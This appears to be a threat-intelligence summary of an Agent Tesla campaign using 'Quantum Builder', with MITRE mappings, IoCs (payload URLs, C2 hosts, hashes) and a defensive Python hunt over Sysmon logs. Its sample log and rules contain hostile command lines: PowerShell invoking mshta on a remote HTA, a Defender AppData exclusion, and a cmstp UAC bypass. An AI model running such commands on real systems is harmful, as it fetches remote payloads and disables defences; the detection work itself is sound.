ThreatLabz details a campaign delivering Agent Tesla via a configurable “Quantum Builder,” which creates LNK, HTA, and ISO payloads to execute a multi-stage infection. The campaign uses obfuscated PowerShell, LOLBins, and UAC bypass techniques to obtain admin privileges and evade defenses. #QuantumBuilder #AgentTesla
Keypoints
- The campaign delivers Agent Tesla (a .NET-based keylogger and RAT) using a builder called “Quantum Builder” sold on dark web marketplaces, with updates adding new infection chains using LNK and HTA payloads.
- The infection chain starts with a spear-phishing email carrying a LNK file (disguised as a PDF) inside a ZIP/GZIP archive; the LNK runs obfuscated PowerShell, which invokes mshta to execute a remote HTA.
- The HTA decrypts and loads a PowerShell loader, which downloads the Agent Tesla binary and uses a CMSTP-based UAC bypass to run it with administrative rights.
- Techniques include in-memory PowerShell execution, Base64 decoding followed by XOR decryption, AES decryption followed by GZIP decompression, and LOLBins (mshta, cmstp) to evade detection and hide activity.
- Agent Tesla capabilities in this campaign cover keylogging, form grabbing, clipboard capture, and FTP-based C2 communication, with stolen data exfiltrated to attacker-controlled servers.
- Variations of the infection chain include alternate LNK/HTA sequences and decoy files; the Quantum Builder is marketed as regularly updated to evade defenses.
- Sandbox detection coverage and IoCs from the campaign list specific LNK/HTA payloads, download URLs, C2 hosts, and Agent Tesla hashes, highlighting the ongoing use of Quantum Builder in the wild.
MITRE Techniques
- [T1566.001] Spearphishing Attachment – The infection chain starts with a spear-phishing email carrying a LNK file bundled in a GZIP archive. “The novel infection chain commences with a spear phishing email … bundled as a GZIP Archive.”
- [T1071.002] Application Layer Protocol: File Transfer Protocols – The C2/receiver channel uses FTP: “FTP based CnC Communication”
- [T1027] Obfuscated Files and Information – Strings in the LNK/HTA payloads are Base64-decoded and XOR-decrypted before the PowerShell stage is loaded. “Decrypts two base64 encoded strings … XOR decrypts both the decoded strings”
- [T1059.001] PowerShell – In-memory PowerShell scripts and loader stages drive payload execution. “Execution of PowerShell scripts in-memory”
- [T1218.005] System Binary Proxy Execution: Mshta – An HTA hosted on a remote server is executed via mshta.exe. “mshta.exe utility to execute a HTML Application (.HTA) file hosted on a remote server”
- [T1059.005] Command and Scripting Interpreter: Visual Basic – The HTA is padded with junk VBScript functions that surround the code doing the actual decryption and loading. “The HTML Application (HTA) File … contains multiple junk VBScript functions”
- [T1548.002] Bypass User Account Control – CMSTP-based UAC bypass used to execute Agent Tesla with admin rights. “CMSTP UAC Bypass”
- [T1140] Deobfuscate/Decode Files or Information – Decryption routines (AES decryption, GZIP decompression) recover the final scripts. “Decrypts the PowerShell loader … AES Decryption and GZIP Decompression”
- [T1562.001] Impair Defenses: Disable or Modify Tools – A Windows Defender exclusion is created during the infection. “exclude the AppData directory from Windows Defender”
- [T1056.001] Input Capture: Keylogging – Agent Tesla capabilities include keystroke capture. “stealing personal data from Browsers, Mail Clients and logs keystrokes”
- [T1036] Masquerading – LNK file disguised with a PDF icon to lure victims. “Malicious .LNK (Windows Shortcut File) file with a PDF icon”
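The process chain summarised in the key points and the technique list above (explorer → PowerShell → mshta fetching a remote HTA → PowerShell adding a Defender exclusion → cmstp.exe with an INF file) is what a detection engineer would hunt for in process-creation telemetry. The following is an added example written for this page, not code from ThreatLabz or from the Quantum Builder report: a small hunt that runs four rules over Sysmon Event ID 1-style records and counts how many distinct stages of the chain appear for one host. The log lines are constructed for the example; the field names (`Image`, `ParentImage`, `CommandLine`), the `-w hidden` switch in the first PowerShell command, and the `/au` flag on cmstp.exe are assumptions, not details taken from the report.

```python
"""Hunt for the LNK -> PowerShell -> mshta -> cmstp chain in process-creation logs.

Added example for this page, not ThreatLabz code. SAMPLE_LOG is constructed
telemetry in a Sysmon Event ID 1-like JSON-per-line shape; the field names
and the exact command-line switches are assumptions.
"""
import json
import re

# Constructed sample telemetry (assumption: one JSON object per line with
# Image, ParentImage and CommandLine, as a Sysmon Event ID 1 export would give).
SAMPLE_LOG = r'''
{"Image":"C:\\Windows\\explorer.exe","ParentImage":"C:\\Windows\\System32\\userinit.exe","CommandLine":"C:\\Windows\\Explorer.EXE"}
{"Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentImage":"C:\\Windows\\explorer.exe","CommandLine":"powershell.exe -w hidden -ep bypass -c \"mshta https://filebin.net/njqyvfot61w0tu9a/ordr.hta\""}
{"Image":"C:\\Windows\\System32\\mshta.exe","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"mshta https://filebin.net/njqyvfot61w0tu9a/ordr.hta"}
{"Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentImage":"C:\\Windows\\System32\\mshta.exe","CommandLine":"powershell.exe -NoP -W Hidden -c Add-MpPreference -ExclusionPath C:\\Users\\bob\\AppData"}
{"Image":"C:\\Windows\\System32\\cmstp.exe","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"cmstp.exe /au C:\\Users\\bob\\AppData\\Local\\Temp\\abc.inf"}
{"Image":"C:\\Windows\\System32\\notepad.exe","ParentImage":"C:\\Windows\\explorer.exe","CommandLine":"notepad.exe C:\\Users\\bob\\notes.txt"}
'''


def basename(path):
    """Lower-cased final path component, tolerant of either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def cmd(e):
    return e.get("CommandLine", "")


# (ATT&CK id, description, predicate over one parsed event). Each rule maps to
# one stage of the chain described on this page.
RULES = [
    ("T1059.001", "PowerShell spawned by explorer.exe with a hidden window (LNK double-click stage)",
     lambda e: basename(e["Image"]) == "powershell.exe"
     and basename(e["ParentImage"]) == "explorer.exe"
     and re.search(r"-w(indowstyle)?\s+hidden", cmd(e), re.I) is not None),
    ("T1218.005", "mshta.exe executing an HTA from a remote URL",
     lambda e: basename(e["Image"]) == "mshta.exe"
     and re.search(r"https?://", cmd(e), re.I) is not None),
    ("T1562.001", "Windows Defender exclusion added for an AppData path",
     lambda e: "add-mppreference" in cmd(e).lower()
     and "exclusionpath" in cmd(e).lower()
     and "appdata" in cmd(e).lower()),
    ("T1548.002", "cmstp.exe run with /au or /s /ni against an INF file (CMSTP UAC bypass)",
     lambda e: basename(e["Image"]) == "cmstp.exe"
     and re.search(r"(/au|/s\s+/ni|/ni\s+/s)\b.*\.inf", cmd(e), re.I) is not None),
]


def parse_events(text):
    """One JSON object per non-empty line."""
    return [json.loads(line) for line in text.strip().splitlines() if line.strip()]


def hunt(events):
    """Return (technique id, description, command line) for every rule hit, in log order."""
    hits = []
    for e in events:
        for tid, desc, pred in RULES:
            if pred(e):
                hits.append((tid, desc, cmd(e)))
    return hits


def chain_score(hits):
    """Number of distinct chain stages seen. An isolated mshta or cmstp launch is
    common benign noise; three or more distinct stages on one host is the pattern
    worth escalating."""
    return len({tid for tid, _, _ in hits})


if __name__ == "__main__":
    found = hunt(parse_events(SAMPLE_LOG))
    for tid, desc, line in found:
        print(f"[{tid}] {desc}\n    {line}")
    print(f"distinct chain stages: {chain_score(found)}")
```

The rules deliberately key on behaviour rather than on the filebin URLs or hashes in the IoC list, since the builder is marketed as regularly updated; the host-level stage count is what survives a change of hosting provider or payload hash.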
Indicators of Compromise
- [File Hash] LNK hashes – 3edfa0cf3b7d54c24013e4f0019dba20, bb914889d5edc6b56c666d2e44e1a437 and 3 more hashes
- [URL] HTA URLs – filebin[.]net/njqyvfot61w0tu9a/ordr[.]hta, filebin[.]net/yiob7vjw7pqow03r/RFQ_270622[.]hta
- [URL] Agent Tesla Download URL – filebin[.]net/e730ez2etlh3weer/MuUQDuaFNoGmHQE[.]exe, 179[.]43[.]175[.]187/puao/PAYMENTS[.]exe
- [Hash] Agent Tesla hashes – d9433faddcaca526b26f713e27e2505f, 213ada506251c477480bd14ea5507bf3
- [Hash] Agent Tesla hashes – 0ebb9d422f8e86458d8fa7f66fe1d0f1, 563fda5da81a5e7818d771222e81f6c4
- [Domain] C2 – mail[.]thesharpening[.]com[.]au, ftp[.]qurvegraphics[.]com
- [IP] Payload host – 179[.]43[.]175[.]187 (serves the HTA and Agent Tesla payloads listed above)
- [URL] HTA URL – 179[.]43[.]175[.]187/puao/PO-M6888722[.]hta
Read more: https://www.zscaler.com/blogs/security-research/agent-tesla-rat-delivered-quantum-builder-new-ttps